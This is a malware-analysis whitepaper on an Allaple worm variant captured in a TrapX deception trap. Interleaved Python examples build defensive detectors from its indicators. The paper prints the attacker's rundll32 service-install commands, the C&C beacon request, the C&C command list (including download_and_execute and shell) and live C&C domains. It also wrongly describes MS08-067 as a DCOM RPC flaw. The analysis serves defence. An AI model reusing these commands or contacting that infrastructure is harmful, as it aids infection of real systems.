
Authored By: Yakov Goldberg and Maayan Fishelov

Date of Publication: September 2015

A VARIANT OF THE NETWORK WORM WIN32 ALLAPLE HAS BEEN SPOTTED IN THE WILD

2 TrapX Security / / www.trapx.com

TABLE OF CONTENTS

SUMMARY 3
ATTACK VECTOR 4
  Shell Commands 4
  About the File WINZRK.EXE 5
AN ANATOMY OF THE ALLAPLE WORM 6
  Persistence Mechanism 6
  Unique Mutex 8
  Geographical Location 9
  COMMAND-and-CONTROL Communications 10
  C&C Commands 10
  Propagation Mechanism 11
  Host Based Indicators 13
  Network Based Indicators 13
  About the Authors 14
ABOUT TRAPX SECURITY 15


SUMMARY

The TrapX Security Research Lab has tracked, captured, and analyzed a malicious attack against a part of our global DeceptionGrid™. The attacker gained remote shell access to one of our DeceptionGrid components, known as a Trap, created two files inside the trap and finally, executed them. The execution of these files resulted in the creation of a variant of the network Win32 Worm known as the Allaple Worm. At the time of writing, there has been a low detection rate of this Worm through online resources such as VirusTotal. This low rate of detection suggests that the majority of anti-virus vendors currently do not have signature detection for this specific malware variant.

Once the Allaple Worm was executed on a victim’s system it attempted to register and execute itself as a service. Once successfully registered, the Worm then remained persistent through system shutdowns and reboots. Static and dynamic analysis of this variant suggested that the Allaple Worm has a capability to propagate to other systems within the network using Microsoft SMB vulnerabilities. The Worm also attempts to beacon to Command-and-Control domains in an effort to either download additional malware components or send and receive additional commands from an attacker. In this paper, the TrapX Security Research Lab has provided the technical details and initial attack vector about this Worm variant.

The Effectiveness of DeceptionGrid

DeceptionGrid is designed to emulate real Windows Operating System (OS) services and protocols. Traps within DeceptionGrid are designed to capture malware binary files while allowing them to execute successfully inside the Trap. Once a file has executed, the Trap captures any additional components the malware creates or drops. This process allows the DeceptionGrid technology to scope multiple malware attack vectors effectively. In this whitepaper we describe how an attacker connected to the sensor's SMB emulation and then exploited it using the MS08-067 vulnerability. The exploit sent shellcode that was supposed to return a cmd.exe shell to the attacker. The sensor recognized the malicious shellcode opcodes and emulated them one by one, returned a fake cmd.exe shell to the attacker (one that does not actually run the commands it is given), and recorded all attacker activity from that point on. As a result, DeceptionGrid captured the commands executed by the attacker, the additional binary files dropped inside the trap, and all command-and-control activity. Once the binary files were captured, the malware sandbox analyzed them to determine their legitimacy, and the TrapX Lab team conducted additional analysis to determine the scope of this attack.


ATTACK VECTOR

Shell Commands

When the attacker gained shell access directly into the DeceptionGrid™ platform, they created two files inside our trap, windll.bin and winzrk.bin. Both files were obfuscated with Base64 encoding. The image below shows the commands the attacker used to accomplish this:

The attacker then created a Windows Visual Basic Script (VBScript) file named winzrk.vbs and executed it with the Windows cscript command. Upon execution it decoded the winzrk.bin file into the Windows binary file winzrk.exe. The image below shows the VBScript file being created by the attacker:


Finally, the winzrk.exe binary was used to decode the Base64-encoded file windll.bin into a new Windows Dynamic Link Library (DLL) file named smbnetwork.dll. The DLL file smbnetwork.dll is the Allaple Worm binary itself. Currently only two anti-virus vendors have a signature that detects this Worm as malicious: ClamAV and Symantec.

About the File WINZRK.EXE

The sole purpose of the winzrk.exe binary was to decode an input file encoded with the Base64 scheme. The decoded output was saved to a new file in the same folder from which winzrk.exe was executed. The name of the output file was not static; it was chosen by the user or process that ran the tool. In this attack, the VBScript named the output file smbnetwork.dll. The following image shows that winzrk.exe carried an embedded Base64 alphabet, which it used to test whether the input file was encoded with a valid Base64 scheme:

The function sub_401150 then read the input file and checked its contents against that Base64 alphabet to verify that the file contained a valid Base64 string:

Upon validation a new decoded output file is created in the same output folder location. For example, here is the command used by the attacker to create the DLL file smbnetwork.dll:

winzrk.exe windll.bin smbnetwork.dll
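The two steps the report attributes to winzrk.exe (an alphabet check, then a decode to an output file) are easy to reproduce on the analyst's side, which is useful when triaging dropped .bin files. The following is an added example, not code from the report or from winzrk.exe itself; it adds one check a practitioner wants, namely whether the decoded output is a PE image, and its sample payload is constructed (a stub carrying only the "MZ" header magic), not the windll.bin from the report.

```python
"""Added example: validate-and-decode a Base64 payload the way a dropper tool
would, then report whether the result is a PE image. Not from the report."""
import base64
import binascii
import string
import tempfile
from pathlib import Path
from typing import Optional

# Standard Base64 alphabet plus the '=' padding character.
_B64_ALPHABET = frozenset((string.ascii_letters + string.digits + "+/=").encode())
# Whitespace is tolerated because droppers often write the payload in wrapped lines.
_WHITESPACE = frozenset(b" \t\r\n")


def is_base64_text(data: bytes) -> bool:
    """True if every byte is a Base64 alphabet character or whitespace."""
    return bool(data) and all(b in _B64_ALPHABET or b in _WHITESPACE for b in data)


def decode_base64_payload(data: bytes) -> Optional[bytes]:
    """Decode data as Base64; None if it fails the alphabet check or has bad padding."""
    if not is_base64_text(data):
        return None
    compact = bytes(b for b in data if b not in _WHITESPACE)
    try:
        # validate=True makes the decoder reject any non-alphabet byte.
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(blob: bytes) -> bool:
    """A decoded DLL or EXE begins with the DOS header magic 'MZ'."""
    return blob[:2] == b"MZ"


def decode_file(src: Path, dst: Path) -> str:
    """Decode src into dst, mirroring the 'winzrk.exe <in> <out>' usage, and
    return a verdict: 'not-base64', 'decoded-pe' or 'decoded-other'."""
    decoded = decode_base64_payload(src.read_bytes())
    if decoded is None:
        return "not-base64"
    dst.write_bytes(decoded)
    return "decoded-pe" if looks_like_pe(decoded) else "decoded-other"


# Constructed sample (not the report's windll.bin): a stub with only the MZ
# magic, encoded with line wrapping the way many Base64 writers emit it.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 100
SAMPLE_ENCODED = base64.encodebytes(SAMPLE_PAYLOAD)


def demo() -> dict:
    """Round-trip the constructed sample through temporary files."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "sample.bin"
        dst = Path(tmp) / "sample.dll"
        src.write_bytes(SAMPLE_ENCODED)
        verdict = decode_file(src, dst)
        return {"verdict": verdict, "roundtrip_ok": dst.read_bytes() == SAMPLE_PAYLOAD}


if __name__ == "__main__":
    print(demo())
```

A file that passes the alphabet check but decodes to something other than a PE image is still worth a look: droppers also stage scripts and configuration this way, so the "decoded-other" verdict is a prompt to inspect the output, not a clean bill of health.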


AN ANATOMY OF THE ALLAPLE WORM

Persistence Mechanism

In an effort to stay persistent on the victim's system, the Allaple Worm registered itself as a service. The service name was SmbNetwork and its ServiceDLL was the Allaple Worm DLL binary itself. The image below shows the registry key created by this Worm on one of our lab systems:

The image on the next page shows how the Allaple Worm used the Windows API function CreateService to create the service.


The Allaple Worm registered itself as a service and then executed itself on the victim's system using the following shell commands:

rundll32 smbnetwork.dll InstallService
rundll32 smbnetwork.dll ExecuteService Zorn


The image below shows how the attacker executed these shell commands inside our trap:

Static analysis of the Allaple Worm DLL shows that it exported the following functions:

ExecuteService
InstallService
KillService
RemoveService
ServiceMain

Besides registering and executing as a service, the Allaple Worm had the ability to stop and remove its own service from the victim's system.

Unique Mutex

The Allaple Worm called the Windows API function CreateMutex and created a unique Mutex object named a15xv9x7s as shown in the image below:


A Mutex (also known as a Mutant) is a global object that lets multiple threads and processes coordinate access to a shared resource. When a program runs, it can create a Mutex, which usually has a unique name.

During our investigation, we identified the Mutex name a15xv9x7s in the handle list of a process in memory. This indicated that the system was compromised with the Allaple Worm, since the Mutex a15xv9x7s is known to be unique to this Worm. Additional information about Mutex objects can be found at https://msdn.microsoft.com/en-us/library/windows/desktop/ms684266(v=vs.85).aspx.

Geographical Location

After the Allaple Worm was successfully executed on the victim's system, it connected to the website http://api.hostip.info/get_html.php to determine its geographical location. The IP address and physical location returned correspond to the system on which the Worm was executed. To accomplish this, the Allaple Worm established the HTTP connection using the Windows API function WinHttpConnect, as shown in the image below:

The hostname string at the offset shown was passed to this function as its argument. Once connected to the target website, the Worm called the Windows API function WinHttpOpenRequest and sent a GET request to obtain the geolocation and public IP address of the victim's system.


There are many reasons why malware authors check the geolocation of the system their malware runs on. Most commonly, the check is used to determine the public IP address registered to the company (and the country) from which the malware was run. If the IP address is of interest, the malware proceeds with the attack or with its next set of commands.

COMMAND-and-CONTROL Communications

The Allaple Worm attempted to communicate with a Command-and-Control (C&C) domain named twofortheworms[.]net46.net. The first HTTP request that the Allaple Worm sent was the following GET request:

GET /command.php?v=6 HTTP/1.1
User-Agent: WinHTTP Example/1.0
Host: twofortheworms.net46.net
Connection: Keep-Alive

Unfortunately, the C&C domain is hosted on a free web hosting service and had reached its Central Processing Unit (CPU) limit. Therefore, the C&C was not functional at the time of our investigation. Analysis of the domain www.net46[.]net suggested that it belongs to the web hosting service called www.000webhost.com.

C&C Commands

Once the Allaple Worm successfully connected to the C&C domain, it would use the following commands to perform additional actions on the victim's system:

end
stop
download_and_execute
kill
execute
update
shell
download

These commands indicate that the Worm could be used to download additional malware components onto the victim's system and to send and receive further commands from the C&C domain.

Finally, the Allaple Worm also attempted to communicate with the domain amf45dfv.no-ip[.]org. Several online resources are currently blacklisting this domain.
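The geolocation lookup, the C&C beacon and the two domains above are all visible at a web proxy, so they can be turned into a detection. The following is an added example, not code from the TrapX report: it parses a constructed proxy log format (one request per line: timestamp, client IP, destination host, method, path, quoted User-Agent) and the log lines are constructed for the example; the indicators it matches (api.hostip.info, GET /command.php?v=6 with User-Agent "WinHTTP Example/1.0", twofortheworms.net46.net, amf45dfv.no-ip.org) are the ones the report lists.

```python
"""Added example: flag the Allaple network behaviour in proxy logs. Not from
the report; log format and log lines are constructed, indicators are the report's."""
import re
import shlex
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Network indicators from the report (defanging brackets removed so they
# compare against real log fields).
CNC_DOMAINS = {"twofortheworms.net46.net", "amf45dfv.no-ip.org"}
GEO_HOST = "api.hostip.info"
BEACON_PATH = re.compile(r"^/command\.php\?v=\d+$")
BEACON_UA = "WinHTTP Example/1.0"

# Constructed sample log: client 10.0.0.7 shows the full Allaple sequence,
# client 10.0.0.9 only visits the geolocation site with a browser User-Agent.
SAMPLE_LOG = """\
2015-09-01T10:00:01Z 10.0.0.7 api.hostip.info GET /get_html.php "WinHTTP Example/1.0"
2015-09-01T10:00:02Z 10.0.0.7 twofortheworms.net46.net GET /command.php?v=6 "WinHTTP Example/1.0"
2015-09-01T10:00:03Z 10.0.0.7 amf45dfv.no-ip.org GET / "WinHTTP Example/1.0"
2015-09-01T10:00:04Z 10.0.0.9 www.example.com GET /index.html "Mozilla/5.0"
2015-09-01T10:00:05Z 10.0.0.9 api.hostip.info GET /get_html.php "Mozilla/5.0"
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one constructed-format log line into its fields."""
    fields = shlex.split(line)  # keeps the quoted User-Agent as one token
    if len(fields) != 6:
        raise ValueError(f"unexpected log line: {line!r}")
    ts, client, host, method, path, ua = fields
    return {"ts": ts, "client": client, "host": host.lower(),
            "method": method, "path": path, "ua": ua}


def reasons_for(req: Dict[str, str]) -> Set[str]:
    """Return the set of indicator names a single request matches."""
    reasons: Set[str] = set()
    if req["host"] in CNC_DOMAINS:
        reasons.add("cnc-domain")
    # The beacon fingerprint is the path together with the sample User-Agent.
    if req["method"] == "GET" and BEACON_PATH.match(req["path"]) and req["ua"] == BEACON_UA:
        reasons.add("beacon-request")
    if req["ua"] == BEACON_UA:
        reasons.add("winhttp-example-ua")
    if req["host"] == GEO_HOST:
        reasons.add("geolocation-lookup")
    return reasons


def scan(lines: Iterable[str]) -> List[Tuple[str, Set[str], str]]:
    """Return (client, reasons, raw line) for every line matching anything."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        req = parse_line(line)
        reasons = reasons_for(req)
        if reasons:
            hits.append((req["client"], reasons, line))
    return hits


def summarize(hits: List[Tuple[str, Set[str], str]]) -> Dict[str, Set[str]]:
    """Merge all reasons seen per client."""
    per_client: Dict[str, Set[str]] = defaultdict(set)
    for client, reasons, _ in hits:
        per_client[client] |= reasons
    return dict(per_client)


def severity(reasons: Set[str]) -> str:
    """C&C contact is high on its own; weaker indicators need corroboration."""
    if reasons & {"cnc-domain", "beacon-request"}:
        return "high"
    if len(reasons) >= 2:
        return "medium"
    return "low"


if __name__ == "__main__":
    for client, reasons in summarize(scan(SAMPLE_LOG.splitlines())).items():
        print(client, severity(reasons), sorted(reasons))
```

"WinHTTP Example/1.0" is the User-Agent string used in Microsoft's WinHTTP sample code, so on its own it also matches legitimate software built from that sample; that is why the example treats it and the geolocation lookup as corroborating signals rather than verdicts, while contact with either listed domain is rated high by itself.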


Propagation Mechanism

The Allaple Worm pinged other IP addresses on the victim's network. Once a remote system was detected, the Allaple Worm attempted a buffer overflow attack using the DCOM Remote Procedure Call (RPC) vulnerability associated with MS08-067. If the exploit succeeded, the Allaple Worm copied itself across the network to the new system and repeated the process described in the attack vector section of this document. The copy process is complete when the affected remote system runs the Worm as a service.

The image below shows some of the named pipes and the Server service protocol sequence ncacn_np that the Allaple Worm used to set up an RPC binding:

The Allaple Worm took these hardcoded named pipes and then called the Windows API functions RpcStringBindingCompose and RpcBindingFromStringBinding in an effort to connect to a remote system:

Additional information about string bindings and the Server service can be found at https://msdn.microsoft.com/en-us/library/aa378691(VS.85).aspx.
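RpcStringBindingCompose assembles, and RpcBindingFromStringBinding consumes, a string in the documented form ObjectUUID@ProtocolSequence:NetworkAddress[Endpoint,Option=Value,...]; for ncacn_np the network address is \\host and the endpoint is a \pipe\name. When hardcoded binding strings are pulled out of a sample like this one, an analyst wants them parsed into hosts and pipes so they can be turned into detections for lateral movement. The following is an added example, not code from the report or from Windows: a parser and composer for that syntax, plus a summary of named-pipe targets. The binding strings, hosts, pipe names and UUID in it are constructed sample values, not the ones from the Worm.

```python
"""Added example: parse and compose RPC string bindings and summarize the
named-pipe targets they point at. Not from the report; samples are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# ObjectUUID@ProtSeq:NetworkAddr[Endpoint,Option=Value,...]; every part but
# the protocol sequence is optional.
_BINDING_RE = re.compile(
    r"^(?:(?P<obj>[0-9a-fA-F-]{36})@)?"   # optional object UUID
    r"(?P<protseq>[a-z_]+):"               # protocol sequence, e.g. ncacn_np
    r"(?P<addr>[^\[]*)"                    # network address, may be empty
    r"(?:\[(?P<rest>[^\]]*)\])?$"          # optional [endpoint,opt=val,...]
)


@dataclass
class StringBinding:
    obj_uuid: Optional[str]
    protseq: str
    network_addr: str
    endpoint: Optional[str]
    options: Dict[str, str] = field(default_factory=dict)


def parse_string_binding(text: str) -> StringBinding:
    """Split a string binding into its components (the inverse of compose)."""
    m = _BINDING_RE.match(text)
    if not m:
        raise ValueError(f"not an RPC string binding: {text!r}")
    endpoint: Optional[str] = None
    options: Dict[str, str] = {}
    rest = m.group("rest")
    if rest:
        parts = rest.split(",")
        # The first bracketed item is the endpoint unless it is an option (has '=').
        if "=" not in parts[0]:
            endpoint = parts[0]
            parts = parts[1:]
        for part in parts:
            key, _, value = part.partition("=")
            options[key.strip()] = value.strip()
    return StringBinding(m.group("obj"), m.group("protseq"), m.group("addr"), endpoint, options)


def compose_string_binding(b: StringBinding) -> str:
    """Rebuild the string form, the way RpcStringBindingCompose would."""
    text = f"{b.obj_uuid}@" if b.obj_uuid else ""
    text += f"{b.protseq}:{b.network_addr}"
    items = ([b.endpoint] if b.endpoint else []) + [f"{k}={v}" for k, v in b.options.items()]
    if items:
        text += "[" + ",".join(items) + "]"
    return text


def named_pipe_targets(bindings: List[str]) -> Dict[str, List[str]]:
    """Map each remote host reached over ncacn_np to the pipes used."""
    targets: Dict[str, Set[str]] = defaultdict(set)
    for text in bindings:
        b = parse_string_binding(text)
        if b.protseq != "ncacn_np" or not b.network_addr:
            continue  # local-only or non-pipe transports are not lateral movement
        host = b.network_addr.lstrip("\\")
        if b.endpoint:
            targets[host].add(b.endpoint)
    return {host: sorted(pipes) for host, pipes in targets.items()}


# Constructed sample bindings (hosts, pipes and UUID are placeholders).
SAMPLE_BINDINGS = [
    r"ncacn_np:\\10.0.0.12[\pipe\srvsvc]",
    r"ncacn_np:\\10.0.0.12[\pipe\browser]",
    r"ncacn_ip_tcp:10.0.0.12[135]",
    r"ncalrpc:[epmapper]",
    r"12345678-1234-1234-1234-123456789abc@ncacn_np:\\FILESRV[\pipe\srvsvc,security=identification]",
]

if __name__ == "__main__":
    print(named_pipe_targets(SAMPLE_BINDINGS))
```

The summary deliberately ignores ncalrpc bindings (local only) and bindings with no network address, since those never leave the host; a sample whose bindings enumerate many hosts over ncacn_np against the same Server-service pipe is the propagation pattern the report describes.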


Host Based Indicators

Object           | Type                                                        | Unique Identifier
-----------------|-------------------------------------------------------------|------------------------------------------
smbnetwork.dll   | Allaple Worm                                                | a5015ecf48a5eff60a6f663fedcb8744b82c7a42
windll.bin       | Base64 Encoded File                                         | 740316070e013e35743afad54dc913bbca46fc3a
winzrk.bat       | Batch File                                                  | b9bfce80a9f1afd947e44d3427fc8c5d69b934c7
winzrk.bin       | Base64 Encoded File                                         | c5c99e14ab385553a1d74f60835d81be50da572c
winzrk.exe       | PE32 Tool                                                   | 2e2e8f926f61671508610598a846386bae592347
winzrk.vbs       | VBScript                                                    | dd0aac65f8f5a674f5726565b3807e926db63212
Shared Resources | Mutex Object                                                | a15xv9x7s
Strings          | Strings seen in the Windows Client/Server Runtime Subsystem | rundll32 smbnetwork.dll InstallService
                 | service                                                     | rundll32 smbnetwork.dll ExecuteService Zorn
Service Name     | Service Name                                                | SmbNetwork
Service DLL      | Service DLL path contains                                   | smbnetwork.dll
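The persistence section and the table above give everything needed to check a host for this variant: the service name, the ServiceDll path, the mutex, the rundll32 command lines and the file hashes. The following is an added example, not TrapX's code, of turning those rows into checks. The HostSnapshot layout is an assumption made for the example (how the data is collected from the registry, handle table and process list is outside it), and the sample snapshots are constructed; the indicator values are the ones from the table.

```python
"""Added example: match a host snapshot against the report's host-based
indicators. Not from the report; snapshot format and samples are constructed."""
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Indicator values from the Host Based Indicators table.
KNOWN_SHA1 = {
    "a5015ecf48a5eff60a6f663fedcb8744b82c7a42": "smbnetwork.dll (Allaple Worm)",
    "740316070e013e35743afad54dc913bbca46fc3a": "windll.bin (Base64 encoded file)",
    "b9bfce80a9f1afd947e44d3427fc8c5d69b934c7": "winzrk.bat (batch file)",
    "c5c99e14ab385553a1d74f60835d81be50da572c": "winzrk.bin (Base64 encoded file)",
    "2e2e8f926f61671508610598a846386bae592347": "winzrk.exe (PE32 tool)",
    "dd0aac65f8f5a674f5726565b3807e926db63212": "winzrk.vbs (VBScript)",
}
KNOWN_MUTEX = "a15xv9x7s"
KNOWN_SERVICE = "smbnetwork"        # compared case-insensitively
KNOWN_SERVICE_DLL = "smbnetwork.dll"
RUNDLL_VERBS = {"installservice", "executeservice"}


@dataclass
class HostSnapshot:
    """Assumed collection format: service name -> ServiceDll/image path,
    open mutex names, process command lines, file path -> SHA-1 hex."""
    services: Dict[str, str] = field(default_factory=dict)
    mutexes: Set[str] = field(default_factory=set)
    cmdlines: List[str] = field(default_factory=list)
    file_hashes: Dict[str, str] = field(default_factory=dict)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_host(snap: HostSnapshot) -> List[str]:
    """Return one finding per matched indicator; an empty list means clean."""
    findings: List[str] = []
    for name, dll in snap.services.items():
        if name.lower() == KNOWN_SERVICE:
            findings.append(f"service name {name!r} matches the Allaple service name")
        if _basename(dll) == KNOWN_SERVICE_DLL:
            findings.append(f"service {name!r} loads {dll!r} (ServiceDll indicator)")
    if KNOWN_MUTEX in snap.mutexes:
        findings.append(f"mutex {KNOWN_MUTEX!r} is present")
    for cmd in snap.cmdlines:
        parts = cmd.split()
        # rundll32 <dll> <export> [args]: match DLL name plus the install/execute export.
        if (len(parts) >= 3
                and _basename(parts[0]) in ("rundll32", "rundll32.exe")
                and _basename(parts[1]) == KNOWN_SERVICE_DLL
                and parts[2].lower() in RUNDLL_VERBS):
            findings.append(f"command line {cmd!r} matches Allaple service install/execute")
    for path, sha1 in snap.file_hashes.items():
        label = KNOWN_SHA1.get(sha1.lower())
        if label:
            findings.append(f"{path} has known SHA-1 {sha1.lower()}: {label}")
    return findings


# Constructed sample snapshots (paths and the unrelated service are placeholders).
SAMPLE_INFECTED = HostSnapshot(
    services={"SmbNetwork": r"C:\Windows\Temp\smbnetwork.dll",
              "Spooler": r"C:\Windows\System32\spoolsv.exe"},
    mutexes={"a15xv9x7s", "Global\\UnrelatedMutex"},
    cmdlines=["rundll32 smbnetwork.dll InstallService",
              "rundll32 smbnetwork.dll ExecuteService Zorn",
              "explorer.exe"],
    file_hashes={r"C:\Windows\Temp\smbnetwork.dll": "a5015ecf48a5eff60a6f663fedcb8744b82c7a42"},
)
SAMPLE_CLEAN = HostSnapshot(
    services={"Spooler": r"C:\Windows\System32\spoolsv.exe"},
    mutexes={"Global\\UnrelatedMutex"},
    cmdlines=["explorer.exe"],
    file_hashes={r"C:\Windows\System32\spoolsv.exe": "0" * 40},
)

if __name__ == "__main__":
    for finding in check_host(SAMPLE_INFECTED):
        print(finding)
```

The service-name and mutex checks are the cheapest to run fleet-wide and do not depend on the sample's hash, which matters here because the report notes that most anti-virus signatures did not yet cover this variant.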

Network Based Indicators

Domain                      | Communication Type
----------------------------|--------------------
twofortheworms[.]net46[.]net | Command-and-Control
amf45dfv.no-ip[.]org         | Unknown


About the Authors

Yakov Goldberg
Senior Security Engineer, TrapX Security, TrapX Security Research Lab
Twitter: @ubersec

Maayan Fishelov
Security Researcher, TrapX Security, TrapX Security Research Lab


ABOUT TRAPX SECURITY

TrapX Security is a leader in the delivery of deception-based cyber security defense. Our solutions rapidly detect, analyze and defend against new zero-day and APT attacks in real time. DeceptionGrid™ provides automated, highly accurate insight into malware and malicious activity unseen by other types of cyber defense. We enable a proactive security posture, fundamentally changing the economics of cyber defense by shifting the cost to the attacker. The TrapX Security customer base includes Forbes Global 2000 commercial and government customers around the world in sectors that include defense, healthcare, finance, energy, consumer products and other key industries. Learn more at www.trapx.com.